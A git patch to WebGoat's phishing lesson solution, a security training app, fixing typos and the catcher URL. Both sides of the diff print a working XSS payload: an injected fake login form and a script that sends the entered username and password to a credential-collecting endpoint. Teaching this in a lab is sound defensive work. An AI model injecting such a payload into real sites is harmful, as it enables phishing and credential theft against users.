From 5be9bb865d970d916c560151e6c03c054b346bcc Mon Sep 17 00:00:00 2001 From: mariethuynh Date: Tue, 23 Mar 2010 00:31:43 +0000 Subject: [PATCH] fixed URL, typos git-svn-id: http://webgoat.googlecode.com/svn/trunk@418 4033779f-a91e-0410-96ef-6bf7bf53c507 --- .../src/main/webapp/lesson_solutions/Phishing.html | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/webgoat/src/main/webapp/lesson_solutions/Phishing.html b/webgoat/src/main/webapp/lesson_solutions/Phishing.html index 24a0607df..c1ba6345d 100644 --- a/webgoat/src/main/webapp/lesson_solutions/Phishing.html +++ b/webgoat/src/main/webapp/lesson_solutions/Phishing.html @@ -18,17 +18,17 @@ hard for a victim to determinate that the content is malicious.

General Goal(s):
The user should be able to add a form asking for username and password. On submit the input should be sent to -http://localhostcatcher?PROPERTY=yes&user=catchedUserName&password=catchedPasswordName +http://localhost/webgoat/catcher?PROPERTY=yes&user=catchedUserName&password=catchedPasswordName

Solution:
-With XSS it is possible to add further elements to an exsisting Page. +With XSS it is possible to add further elements to an existing Page. This solution consists of two parts you have to combine: -A Form whith username and password could look like this:
+A Form with username and password could look like this:

<form><br><br><HR><H3>This feature requires account login:</H3 ><br><br>Enter Username:<br><input type="text" id="user" @@ -40,19 +40,19 @@ Now you need a script:

<script>function hack(){ alert("Had this been a real attack... Your credentials were just stolen." User Name = " + document.forms[0].user.value + "Password = " + document.forms[0].pass.value); -XSSImage=new Image; XSSImage.src="http://localhostcatcher?PROPERTY=yes&user="+ +XSSImage=new Image; XSSImage.src="http://localhost/webgoat/catcher?PROPERTY=yes&user="+ document.forms[0].user.value + "&password=" + document.forms[0].pass.value + "";} </script>

This script will read the input from the form and send it to the catcher of WebGoat.

The last step is to put things together. Add a Button to the form which -calls the script. You can reach this wicht the onclick="myFunction" handler. +calls the script. You can reach this with the onclick="myFunction" handler.

The final String looks like this:
<script>function hack(){ alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.forms[0].user.value + "Password = " + document.forms[0].pass.value); -XSSImage=new Image; XSSImage.src="http://localhostcatcher?PROPERTY=yes&user="+ +XSSImage=new Image; XSSImage.src="http://localhost/webgoat/catcher?PROPERTY=yes&user="+ document.forms[0].user.value + "&password=" + document.forms[0].pass.value + "";} </script><form><br><br><HR><H3>This feature requires account login:</H3 ><br><br>Enter Username:<br><input type="text" id="user"